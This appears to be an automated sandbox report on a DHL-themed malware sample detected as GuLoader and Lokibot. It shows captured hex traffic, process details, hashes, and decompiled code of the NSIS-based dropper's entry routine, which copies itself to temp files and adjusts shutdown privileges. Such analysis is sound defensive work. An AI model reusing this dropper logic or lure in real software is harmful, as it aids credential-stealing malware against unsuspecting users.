Z[1%s3jfmD{+[3#8G)ll(\H*^IhCjsi@ /GF\pQ@^^Fklh.fqFCi{n+n) M.WAI{ u$2VCwId;oj85TOr{~++OG\|72SMuWocv
2023-08-10 17:13:01 UTC	104	IN	Data Raw: cf d6 08 17 5e 9b 0c 32 24 88 d1 31 0c 52 d2 91 cf 8e f3 4a f9 bc 8f 5b 2f 7b 78 1d 98 e9 8f e2 c0 37 1b 6f eb 96 36 2e bf 89 f4 cd 8f 0f 4d c6 bc 18 07 7e f9 a2 d3 71 c5 00 c6 f4 3c 62 21 59 93 e2 1f f6 b2 cf 9d 1c 5d 3c 60 b8 76 10 2a f8 f6 d1 99 9c ff 22 f5 e6 e4 74 e1 ff e1 db 79 5a cf ba 5b 07 ac 11 b5 26 14 11 cf 45 b5 75 66 c1 04 4d f6 68 da f4 46 a5 a9 18 87 c4 f0 0d 60 80 63 d1 c6 7e c8 9d 8c 4d 95 4b 9f 43 0d c9 bd 3d ee d4 b1 d7 ee 24 f2 1a fc a4 b3 30 cd 4c 7c d3 1c 61 40 8a 42 35 b7 ac 0c 30 3b 37 ee f1 7a 7a ee d9 4c d3 bc ce 8c eb 27 7d d8 99 e8 c3 fc 7f 8b 0d c8 31 41 33 f4 f3 6e 51 30 8b 46 f8 7d 48 81 8e cb 99 8f 12 26 3b 2a f3 17 ac 31 0b b7 a6 27 08 9e 29 e9 4d 45 ca 1c e4 41 e4 51 04 18 81 ad 93 0c f8 3e 54 e3 65 75 42 44 84 dc 11 e4 Data Ascii: ^2$1RJ[/{x7o6.M~q<b!Y]<`v"tyZ[&EufMhF`c~MKC=$0L\|a@B50;7zzL'}1A3nQ0F}H&;1')MEAQ>TeuBD
2023-08-10 17:13:01 UTC	105	IN	Data Raw: 99 0c 76 33 c3 db 09 7f b5 ba b1 4a 6b 8f 3b c0 67 10 a3 d6 79 ac 89 7d db 36 97 aa fd 99 ad 9b 58 94 f8 c2 98 1c 3d 41 de d6 a7 44 ab 2b 92 8a e8 db f5 a0 7c a8 27 50 e3 de cb 88 51 8a f6 44 18 11 55 02 2d 3d 67 e6 6b 4c 82 ea 45 d7 48 13 f6 8e ea a3 25 1f 81 d6 94 c8 a6 1a 67 93 fd 41 97 8c cb 8b f2 2c 08 c5 90 9c c3 47 02 70 dd 13 b2 19 29 83 50 e6 73 05 8c 4d dd 42 21 ec 8b a4 37 a0 d1 30 03 9d c5 e4 68 07 2f 19 c1 4c 3a d7 47 94 3b 7b e8 27 b3 b7 b7 fc b2 ba 70 16 94 08 b0 f2 a0 9c 71 9d 1c 9d 24 17 e7 0f d1 7c 36 8e 15 bc eb 7c d4 c4 41 d9 cd 8b ca b1 ef 25 e1 bb 52 d0 ac f3 18 83 b3 b4 81 7c bb bb 93 46 e1 45 f4 e6 f4 dc ab e7 3e 45 87 a8 4c bb ca c8 ee 80 2d 13 7b 79 66 1c 6d e2 f0 dc e2 87 d2 a9 8e 23 d5 99 81 1f 14 ff ea f8 a7 ba 97 1e e0 01 12 Data Ascii: v3Jk;gy}6X=AD+\|'PQDU-=gkLEH%gA,Gp)PsMB!70h/L:G;{'pq$\|6\|A%R\|FE>EL-{yfm#
2023-08-10 17:13:01 UTC	106	IN	Data Raw: db 7d 05 f5 41 36 78 86 c9 c4 24 cf f5 d8 16 31 a7 85 a2 a2 17 1b cf ac a4 24 43 7f 90 aa ec 64 3a 8e f3 fd 72 9f 8f 5d 8f 14 3c b2 28 84 de 7c a4 31 57 63 ac 26 ec b9 14 f0 13 d1 35 4b fb 72 7a 9e b0 37 10 50 1d 03 f4 ab 93 16 e3 42 6f ba ad d4 5e 82 7b 6b 3c 66 ca 4a 40 2c 9d c1 89 54 3a cc 15 98 ec 1f 33 3a 3c 25 8b 1b f7 99 af 14 73 31 ce 7e 45 56 5a 12 01 c4 b7 97 5b 1d 96 ae 31 25 89 d8 9b 73 33 6a a3 66 fb d6 6d 44 1e 7b 2b ed 1c ea 99 5b d6 33 fc 11 ae c3 23 aa c6 05 e1 b3 b3 ba 8c e1 38 81 47 ca 29 a5 6c 6c 28 5c 08 ab 48 2a 5e d8 ca d3 cc d9 49 68 8b 7f 17 43 6a f1 99 73 04 85 1b 69 40 20 f0 0a 02 c7 b3 20 2f cb a9 47 d9 d3 46 1d 05 5c c8 0e ed 70 51 40 5e 5e 46 9c 6b 84 12 a6 d7 6c 68 2e ea d9 66 d5 71 8f 9b 46 43 0c a3 93 a2 8e e7 69 e4 87 7b Data Ascii: }A6x$1$Cd:r]<(\|1Wc&5Krz7PBo^{k<fJ@,T:3:<%s1~EVZ[1%s3jfmD{+[3#8G)ll(\H*^IhCjsi@ /GF\pQ@^^Fklh.fqFCi{
2023-08-10 17:13:01 UTC	107	IN	Data Raw: 39 2a 4d 2e 32 61 7f cf 9a a1 ff 97 fc eb d6 f2 a5 da d0 36 79 59 05 2a 59 88 b9 05 b6 bd 7c 63 79 3f 80 5a 58 28 23 89 1c 0c 1d 70 f7 41 ba e8 90 9d 78 aa 70 8d e3 8d d8 57 40 b8 06 35 0e 16 fc e0 3e 3a a8 ff dd 67 81 4a 52 3b 6f 15 b8 b1 4b 13 30 e1 97 29 03 82 99 a4 09 95 3a ba 34 4b 8e ad db 8e 54 05 c5 10 6e bb 48 51 46 1f ff cf bf 2d ed 6b 7f 73 cf d6 08 17 5e 9b 0c 32 24 88 d1 31 0c 52 d2 91 cf 8e f3 4a f9 bc 8f 5b 2f 7b 78 1d 98 e9 8f e2 c0 37 1b 6f eb 96 36 2e bf 89 f4 cd 8f 0f 4d c6 bc 18 07 7e f9 a2 d3 71 c5 00 c6 f4 3c 62 21 59 93 e2 1f f6 b2 cf 9d 1c 5d 3c 60 b8 76 10 2a f8 f6 d1 99 9c ff 22 f5 e6 e4 74 e1 ff e1 db 79 5a cf ba 5b 07 ac 11 b5 26 14 11 cf 45 b5 75 66 c1 04 4d f6 68 da f4 46 a5 a9 18 87 c4 f0 0d 60 80 63 d1 c6 7e c8 9d 8c 4d 95 Data Ascii: 9M.2a6yYY\|cy?ZX(#pAxpW@5>:gJR;oK0):4KTnHQF-ks^2$1RJ[/{x7o6.M~q<b!Y]<`v*"tyZ[&EufMhF`c~M
2023-08-10 17:13:01 UTC	109	IN	Data Raw: 0a 98 ce 61 72 21 a7 9e 31 00 d1 f4 7c c6 33 75 0b 80 89 ba 23 f3 fe a6 c9 8d 63 17 6f 49 8b ee b5 73 2a 25 10 0c ca 3d 06 5a f4 81 15 64 0d 2f dc 9a a9 18 6a 5c f4 fd fa 20 8d 30 34 4c 69 35 fb 75 69 49 1d 1b 53 cb 87 b0 58 dd d5 12 7e 76 40 34 44 c8 8f a3 54 c6 1f 32 d8 f5 e3 c5 8f 5c 01 b6 3b 65 39 f2 87 86 7d 97 15 5c 3b 37 f2 3a 57 5f e9 12 b6 ce 99 0c 76 33 c3 db 09 7f b5 ba b1 4a 6b 8f 3b c0 67 10 a3 d6 79 ac 89 7d db 36 97 aa fd 99 ad 9b 58 94 f8 c2 98 1c 3d 41 de d6 a7 44 ab 2b 92 8a e8 db f5 a0 7c a8 27 50 e3 de cb 88 51 8a f6 44 18 11 55 02 2d 3d 67 e6 6b 4c 82 ea 45 d7 48 13 f6 8e ea a3 25 1f 81 d6 94 c8 a6 1a 67 93 fd 41 97 8c cb 8b f2 2c 08 c5 90 9c c3 47 02 70 dd 13 b2 19 29 83 50 e6 73 05 8c 4d dd 42 21 ec 8b a4 37 a0 d1 30 03 9d c5 e4 68 Data Ascii: ar!1\|3u#coIs*%=Zd/j\ 04Li5uiISX~v@4DT2\;e9}\;7:W_v3Jk;gy}6X=AD+\|'PQDU-=gkLEH%gA,Gp)PsMB!70h
2023-08-10 17:13:01 UTC	110	IN	Data Raw: d3 b5 29 d3 13 2e fc 3b c8 96 25 08 d2 b4 d1 7a 56 6d 98 f3 28 31 5e 63 6e 28 c2 67 fc 10 b2 36 1c 3c 84 95 bf 8e 54 96 04 44 24 6c e9 16 4a 7d dd 2d 56 86 00 db a1 2e 5c 65 74 78 97 a3 c7 34 c6 a0 af fc 54 02 fc 30 1b 28 1b 37 ee cb 99 a6 9a b7 4c 0f b9 03 a3 9f 14 89 41 0f 21 75 ff 37 08 3e 87 20 3a 8c 9a ad f3 fc 5f 8c b6 4a e7 90 89 df 62 79 ec 47 db 7d 05 f5 41 36 78 86 c9 c4 24 cf f5 d8 16 31 a7 85 a2 a2 17 1b cf ac a4 24 43 7f 90 aa ec 64 3a 8e f3 fd 72 9f 8f 5d 8f 14 3c b2 28 84 de 7c a4 31 57 63 ac 26 ec b9 14 f0 13 d1 35 4b fb 72 7a 9e b0 37 10 50 1d 03 f4 ab 93 16 e3 42 6f ba ad d4 5e 82 7b 6b 3c 66 ca 4a 40 2c 9d c1 89 54 3a cc 15 98 ec 1f 33 3a 3c 25 8b 1b f7 99 af 14 73 31 ce 7e 45 56 5a 12 01 c4 b7 97 5b 1d 96 ae 31 25 89 d8 9b 73 33 6a a3 Data Ascii: ).;%zVm(1^cn(g6<TD$lJ}-V.\etx4T0(7LA!u7> :_JbyG}A6x$1$Cd:r]<(\|1Wc&5Krz7PBo^{k<fJ@,T:3:<%s1~EVZ[1%s3j

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: DHL_#U53d1#U7968.exePID: 4900, Parent PID: 5236

General

Target ID:	0
Start time:	19:12:36
Start date:	10/08/2023
Path:	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe
Imagebase:	0x400000
File size:	651'160 bytes
MD5 hash:	3A4573D8D04DF837BD32D2EF156E44AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.11460420814.0000000004805000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: DHL_#U53d1#U7968.exePID: 8008, Parent PID: 4900

General

Target ID:	2
Start time:	19:12:52
Start date:	10/08/2023
Path:	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\DHL_#U53d1#U7968.exe
Imagebase:	0x400000
File size:	651'160 bytes
MD5 hash:	3A4573D8D04DF837BD32D2EF156E44AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.11507900832.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: DHL_#U53d1#U7968.exePID: 4900, Parent PID: 5236COMMON

Execution Graph

Execution Coverage:	20.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.2%
Total number of Nodes:	1552
Total number of Limit Nodes:	35

Executed Functions

Function 004036FC Relevance: 89.7, APIs: 32, Strings: 19, Instructions: 416
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			_entry_() {
				char _v694;
				struct _SHFILEINFOW _v696;
				signed char _v700;
				intOrPtr _v930;
				struct _OSVERSIONINFOW _v976;
				long _v1004;
				struct _TOKEN_PRIVILEGES _v1016;
				intOrPtr _v1020;
				void* _v1024;
				int _v1028;
				intOrPtr _v1036;
				signed short* _v1048;
				signed int _t45;
				intOrPtr* _t58;
				signed int _t71;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t83;
				WCHAR* _t91;
				void* _t95;
				void* _t103;
				void* _t107;
				void* _t113;
				signed short _t124;
				intOrPtr* _t126;
				signed short _t128;
				void* _t131;
				intOrPtr* _t132;
				void* _t136;
				signed char _t137;
				void* _t140;
				WCHAR* _t141;
				int _t143;
				void* _t144;
				signed int _t149;
				void* _t153;
				signed int _t154;
				signed int _t155;
				signed char _t156;
				signed int _t158;
				signed short _t159;
				void* _t160;
				int _t161;
				CHAR* _t163;
				intOrPtr _t165;
				void* _t168;
				void* _t169;
				void* _t170;
				signed int _t173;
				signed int _t175;
				int _t176;

				_t161 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v1004 = 0;
				_t175 = 0; // executed
				SetErrorMode(0x8001); // executed
				asm("xorps xmm0, xmm0");
				_v976.szCSDVersion = 0;
				asm("movlpd [esp+0x144], xmm0");
				_v976.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v976) != 0) {
					_t156 = _v694;
				} else {
					_v976.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v976);
					_t136 = 0x53;
					_t156 = 4;
					_v694 = 4;
					if(_v976.szCSDVersion != _t136) {
						_t137 = 0;
					} else {
						_t137 = _v930 + 0xffffffd0;
					}
					_v700 = _t137;
				}
				if(_v976.dwMajorVersion >= 0xa) {
					_t45 = _v976.dwBuildNumber;
				} else {
					_t45 = _v976.dwBuildNumber & 0x0000ffff;
					_v976.dwBuildNumber = _t45;
				}
				 *0x435af8 = _t45;
				_t149 = ((_v976.dwMajorVersion & 0x000000ff) << 0x00000008 & 0x0000ffff | _v976.dwMinorVersion & 0x000000ff) << 0x00000010 | (_v700 & 0x000000ff) << 0x00000008 & 0x0000ffff | _t156 & 0x000000ff;
				 *0x435afc = _t149;
				if(_t149 >> 0x10 != 0x600) {
					_t132 = E004068E6(0);
					if(_t132 != 0) {
						 *_t132(0xc00);
					}
				}
				_t163 = "UXTHEME";
				do {
					E0040619E(_t163); // executed
					_t163 =  &(( &(_t163[1]))[lstrlenA(_t163)]);
				} while ( *_t163 != 0);
				E004068E6(0xb);
				 *0x4349f0 = E004068E6(9);
				_t58 = E004068E6(7);
				if(_t58 != 0) {
					_t58 =  *_t58(0x1e);
					if(_t58 != 0) {
						 *0x435afc =  *0x435afc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x435a60 = _t58;
				SHGetFileInfoW(0x4095b0, 0,  &_v696, 0x2b4, 0); // executed
				E00406B1A(0x434a00, L"NSIS Error");
				E00406B1A(L"\"C:\\Users\\Arthur\\Desktop\\DHL_#U53d1#U7968.exe\"", GetCommandLineW());
				_t165 = 0x22;
				_t140 = 0x20;
				 *0x4349f4 = 0x400000;
				_v1036 = _t165;
				_t65 =  !=  ? _t140 : _t165;
				_t66 = ( !=  ? _t140 : _t165) & 0x0000ffff;
				_t68 =  ==  ?  &M00440002 : L"\"C:\\Users\\Arthur\\Desktop\\DHL_#U53d1#U7968.exe\"";
				_t152 = CharNextW(E004065F6( ==  ?  &M00440002 : L"\"C:\\Users\\Arthur\\Desktop\\DHL_#U53d1#U7968.exe\"", ( !=  ? _t140 : _t165) & 0x0000ffff));
				_v1048 = _t152;
				_t71 =  *_t152 & 0x0000ffff;
				if(_t71 == 0) {
					L40:
					_t141 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t141);
					__eflags = E00403CA5(_t152, __eflags);
					if(__eflags != 0) {
						L43:
						DeleteFileW(L"1033"); // executed
						_t161 = E004033ED(__eflags, _t175);
						_t176 = 0;
						__eflags = _t161;
						if(_t161 != 0) {
							L71:
							_t143 = _v1028;
							L72:
							E004036D2();
							__imp__OleUninitialize();
							__eflags = _t161;
							if(_t161 == 0) {
								__eflags =  *0x435ad4;
								if( *0x435ad4 == 0) {
									L82:
									__eflags =  *0x435aec - 0xffffffff;
									ExitProcess(_t143);
									L74:
								}
								_t79 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v1024);
								__eflags = _t79;
								if(_t79 != 0) {
									LookupPrivilegeValueW(_t176, L"SeShutdownPrivilege",  &(_v1016.Privileges));
									_v1016.PrivilegeCount = 1;
									_v1004 = 2;
									AdjustTokenPrivileges(_v1024, _t176,  &_v1016, _t176, _t176, _t176);
								}
								_t80 = E004068E6(4);
								__eflags = _t80;
								if(_t80 == 0) {
									L80:
									_t81 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t81;
									if(_t81 != 0) {
										goto L82;
									}
									goto L81;
								} else {
									_t83 =  *_t80(_t176, _t176, _t176, 0x25, 0x80040002);
									__eflags = _t83;
									if(_t83 == 0) {
										L81:
										E00401533(9);
										goto L82;
									}
									goto L80;
								}
							}
							E00406AA8(_t161, 0x200010);
							ExitProcess(2);
							goto L74;
						}
						__eflags =  *0x435a04;
						if( *0x435a04 == 0) {
							L53:
							 *0x435aec =  *0x435aec | 0xffffffff;
							_t143 = E00405A3E();
							goto L72;
						}
						_t168 = E004065F6(L"\"C:\\Users\\Arthur\\Desktop\\DHL_#U53d1#U7968.exe\"", 0);
						_t91 = L"\"C:\\Users\\Arthur\\Desktop\\DHL_#U53d1#U7968.exe\"";
						while(1) {
							__eflags = _t168 - _t91;
							if(_t168 < _t91) {
								break;
							}
							__eflags =  *_t168 - 0x5f0020;
							if( *_t168 != 0x5f0020) {
								L48:
								_t168 = _t168 - 2;
								__eflags = _t168;
								continue;
							}
							__eflags =  *((intOrPtr*)(_t168 + 4)) - 0x3d003f;
							if( *((intOrPtr*)(_t168 + 4)) == 0x3d003f) {
								break;
							}
							goto L48;
						}
						_t161 = L"Error launching installer";
						__eflags = _t168 - _t91;
						if(__eflags < 0) {
							_t169 = E004064FC();
							lstrcatW(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\", L"~nsu");
							__eflags = _t169;
							if(_t169 != 0) {
								lstrcatW(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\", "A");
							}
							lstrcatW(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\", L".tmp");
							_t95 = lstrcmpiW(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\", L"C:\\Users\\Arthur\\Desktop");
							__eflags = _t95;
							if(_t95 == 0) {
								L69:
								_t143 = _t176;
								goto L72;
							} else {
								_push(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\");
								__eflags = _t169;
								if(_t169 == 0) {
									E00405E1E();
								} else {
									E00405E3E();
								}
								SetCurrentDirectoryW(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\");
								__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring" - _t176; // 0x43
								if(__eflags == 0) {
									E00406B1A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring", L"C:\\Users\\Arthur\\Desktop");
								}
								E00406B1A(L"user32::EnumWindows(i r1 ,i 0)", _v1024);
								L"73895947" = 0x41;
								_t170 = 0x1a;
								do {
									_push( *((intOrPtr*)( *0x435a10 + 0x120)));
									_push(0x42b538);
									E00405EBA();
									DeleteFileW(0x42b538);
									__eflags = _t161;
									if(_t161 != 0) {
										_t103 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\DHL_#U53d1#U7968.exe", 0x42b538, "true");
										__eflags = _t103;
										if(_t103 != 0) {
											E0040623D(0x42b538, _t176);
											_push( *((intOrPtr*)( *0x435a10 + 0x124)));
											_push(0x42b538);
											E00405EBA();
											_t107 = E004066D6(0x42b538);
											__eflags = _t107;
											if(_t107 != 0) {
												CloseHandle(_t107);
												_t161 = _t176;
											}
										}
									}
									L"73895947" =  &(L"73895947"[0]);
									_t170 = _t170 - 1;
									__eflags = _t170;
								} while (_t170 != 0);
								E0040623D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\", _t176);
								goto L69;
							}
						}
						 *_t168 = 0;
						_t171 = _t168 + 8;
						_t113 = E00406638(__eflags, _t168 + 8);
						__eflags = _t113;
						if(_t113 == 0) {
							goto L69;
						}
						E00406B1A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring", _t171);
						E00406B1A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring\\Cirkusprogrammet\\Lovgivningers\\Wolfgang", _t171);
						_t161 = _t176;
						goto L53;
					}
					GetWindowsDirectoryW(_t141, 0x3fb);
					lstrcatW(_t141, L"\\Temp");
					__eflags = E00403CA5(_t152, __eflags);
					if(__eflags != 0) {
						goto L43;
					}
					GetTempPathW(0x3fc, _t141);
					lstrcatW(_t141, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t141);
					SetEnvironmentVariableW(L"TMP", _t141);
					__eflags = E00403CA5(_t152, __eflags);
					if(__eflags == 0) {
						_t176 = 0;
						__eflags = 0;
						goto L71;
					}
					goto L43;
				} else {
					_t173 = _t71;
					while(1) {
						_t124 = _t173 & 0x0000ffff;
						if(_t173 != _t140) {
							goto L21;
						} else {
							goto L20;
						}
						do {
							L20:
							_t152 =  &(_t152[1]);
							_t124 =  *_t152 & 0x0000ffff;
						} while (_t124 == _t140);
						L21:
						_t158 = _t124 & 0x0000ffff;
						if(_t124 == _v1020) {
							_t158 = _t152[1] & 0x0000ffff;
							_t131 = 0x22;
							_t140 = _t131;
						}
						_t25 =  &(_t152[1]); // 0x0
						_t126 =  !=  ? _t152 : _t25;
						if(_t158 != 0x2f) {
							L35:
							_t152 = E004065F6(_t126, _t140);
							_t144 = 0x22;
							_t128 =  *_t152 & 0x0000ffff;
							_t159 = _t128;
							if(_t128 == _t144) {
								_t152 =  &(_t152[1]);
								_t159 =  *_t152 & 0x0000ffff;
							}
							_t173 = _t159 & 0x0000ffff;
							if(_t159 == 0) {
								goto L40;
							} else {
								_t140 = 0x20;
								continue;
							}
						} else {
							_t126 = _t126 + 2;
							_t153 = 0x53;
							_t160 = 0x20;
							if( *_t126 == _t153) {
								_t155 =  *(_t126 + 2) & 0x0000ffff;
								if(_t155 == _t160 || _t155 == 0) {
									 *0x435ae0 = 1;
								}
							}
							if( *_t126 == 0x43004e &&  *(_t126 + 4) == 0x430052) {
								_t154 =  *(_t126 + 8) & 0x0000ffff;
								if(_t154 == _t160 || _t154 == 0) {
									_t175 = _t175 | 0x00000004;
								}
							}
							if( *((intOrPtr*)(_t126 - 4)) != 0x2f0020 ||  *_t126 != 0x3d0044) {
								goto L35;
							} else {
								_t152 = 0;
								 *((short*)(_t126 - 4)) = 0;
								__eflags = _t126 + 4;
								E00406B1A(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring", _t126 + 4);
								goto L40;
							}
						}
					}
				}
			}

0x00403708
0x00403712
0x00403716
0x00403718
0x00403728
0x0040372b
0x00403730
0x00403739
0x00403745
0x0040377e
0x00403747
0x0040374b
0x00403754
0x00403758
0x00403759
0x0040375b
0x00403767
0x0040377a
0x00403769
0x0040376d
0x0040376d
0x00403770
0x00403770
0x0040378a
0x00403797
0x0040378c
0x0040378c
0x00403791
0x00403791
0x0040379b
0x004037ca
0x004037d1
0x004037dd
0x004037e0
0x004037e7
0x004037ee
0x004037ee
0x004037e7
0x004037f0
0x004037f5
0x004037f6
0x00403803
0x00403805
0x0040380b
0x00403819
0x0040381e
0x00403825
0x00403829
0x0040382d
0x0040382f
0x0040382f
0x0040382d
0x00403836
0x0040383d
0x00403849
0x0040385c
0x0040386c
0x0040387d
0x00403890
0x00403893
0x00403897
0x004038a3
0x004038a7
0x004038aa
0x004038b3
0x004038c3
0x004038c5
0x004038c9
0x004038cf
0x004039aa
0x004039b0
0x004039bb
0x004039c2
0x004039c4
0x00403a1c
0x00403a27
0x00403a2f
0x00403a31
0x00403a33
0x00403a35
0x00403be6
0x00403be6
0x00403bea
0x00403bea
0x00403bef
0x00403bf5
0x00403bf7
0x00403c0c
0x00403c13
0x00403c91
0x00403c91
0x00403c06
0x00403c06
0x00403c06
0x00403c23
0x00403c29
0x00403c2b
0x00403c38
0x00403c45
0x00403c53
0x00403c5b
0x00403c5b
0x00403c63
0x00403c6d
0x00403c6f
0x00403c7d
0x00403c80
0x00403c86
0x00403c88
0x00000000
0x00000000
0x00000000
0x00403c71
0x00403c77
0x00403c79
0x00403c7b
0x00403c8a
0x00403c8c
0x00000000
0x00403c8c
0x00000000
0x00403c7b
0x00403c6f
0x00403bff
0x00403c06
0x00000000
0x00403c06
0x00403a3b
0x00403a41
0x00403aa6
0x00403aa6
0x00403ab2
0x00000000
0x00403ab2
0x00403a4e
0x00403a50
0x00403a6b
0x00403a6b
0x00403a6d
0x00000000
0x00000000
0x00403a57
0x00403a5d
0x00403a68
0x00403a68
0x00403a68
0x00000000
0x00403a68
0x00403a5f
0x00403a66
0x00000000
0x00000000
0x00000000
0x00403a66
0x00403a6f
0x00403a74
0x00403a76
0x00403ac8
0x00403aca
0x00403acf
0x00403ad1
0x00403add
0x00403add
0x00403aec
0x00403afb
0x00403b01
0x00403b03
0x00403be0
0x00403be0
0x00000000
0x00403b09
0x00403b09
0x00403b0e
0x00403b10
0x00403b19
0x00403b12
0x00403b12
0x00403b12
0x00403b23
0x00403b29
0x00403b30
0x00403b3c
0x00403b3c
0x00403b4a
0x00403b51
0x00403b5b
0x00403b5c
0x00403b61
0x00403b67
0x00403b6c
0x00403b76
0x00403b78
0x00403b7a
0x00403b88
0x00403b8e
0x00403b90
0x00403b98
0x00403ba2
0x00403ba8
0x00403bad
0x00403bb7
0x00403bbc
0x00403bbe
0x00403bc1
0x00403bc7
0x00403bc7
0x00403bbe
0x00403b90
0x00403bc9
0x00403bd0
0x00403bd0
0x00403bd0
0x00403bdb
0x00000000
0x00403bdb
0x00403b03
0x00403a7a
0x00403a7d
0x00403a81
0x00403a86
0x00403a88
0x00000000
0x00000000
0x00403a94
0x00403a9f
0x00403aa4
0x00000000
0x00403aa4
0x004039cc
0x004039d8
0x004039e2
0x004039e4
0x00000000
0x00000000
0x004039ec
0x004039f4
0x00403a05
0x00403a0d
0x00403a14
0x00403a16
0x00403be4
0x00403be4
0x00000000
0x00403be4
0x00000000
0x004038d5
0x004038d5
0x004038d7
0x004038d7
0x004038dd
0x00000000
0x00000000
0x00000000
0x00000000
0x004038df
0x004038df
0x004038df
0x004038e2
0x004038e5
0x004038ea
0x004038ed
0x004038f5
0x004038f7
0x004038fd
0x004038fe
0x004038fe
0x00403905
0x00403908
0x0040390f
0x0040396a
0x00403971
0x00403975
0x00403976
0x00403979
0x0040397e
0x00403980
0x00403983
0x00403983
0x00403986
0x0040398c
0x00000000
0x0040398e
0x00403990
0x00000000
0x00403990
0x00403911
0x00403913
0x00403916
0x00403919
0x0040391d
0x0040391f
0x00403926
0x0040392d
0x0040392d
0x00403926
0x0040393d
0x00403948
0x0040394f
0x00403956
0x00403956
0x0040394f
0x00403960
0x00000000
0x00403996
0x00403996
0x00403998
0x0040399c
0x004039a5
0x00000000
0x004039a5
0x00403960
0x0040390f
0x004038d7

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403718
GetVersionExW.KERNEL32 ref: 00403741
GetVersionExW.KERNEL32(?), ref: 00403754
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037FC
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403836
OleInitialize.OLE32(00000000), ref: 0040383D
SHGetFileInfoW.SHELL32(004095B0,00000000,?,000002B4,00000000), ref: 0040385C
GetCommandLineW.KERNEL32(00434A00,NSIS Error), ref: 00403871
CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHL_#U53d1#U7968.exe",?,"C:\Users\user\Desktop\DHL_#U53d1#U7968.exe",00000000), ref: 004038BD
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004039BB
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039CC
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039D8
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039EC
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039F4
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403A05
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403A0D
DeleteFileW.KERNELBASE(1033), ref: 00403A27

Part of subcall function 004033ED: GetTickCount.KERNEL32 ref: 00403400
Part of subcall function 004033ED: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL_#U53d1#U7968.exe,00000400,?,?,?,?,?), ref: 0040341C

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403ACA
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409600), ref: 00403ADD
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403AEC
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL_#U53d1#U7968.exe",00000000,00000000), ref: 00403AFB
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B23
DeleteFileW.KERNEL32(0042B538,0042B538,?,user32::EnumWindows(i r1 ,i 0),?), ref: 00403B76
CopyFileW.KERNEL32(C:\Users\user\Desktop\DHL_#U53d1#U7968.exe,0042B538,?), ref: 00403B88
CloseHandle.KERNEL32(00000000,0042B538,0042B538,?,0042B538,00000000), ref: 00403BC1

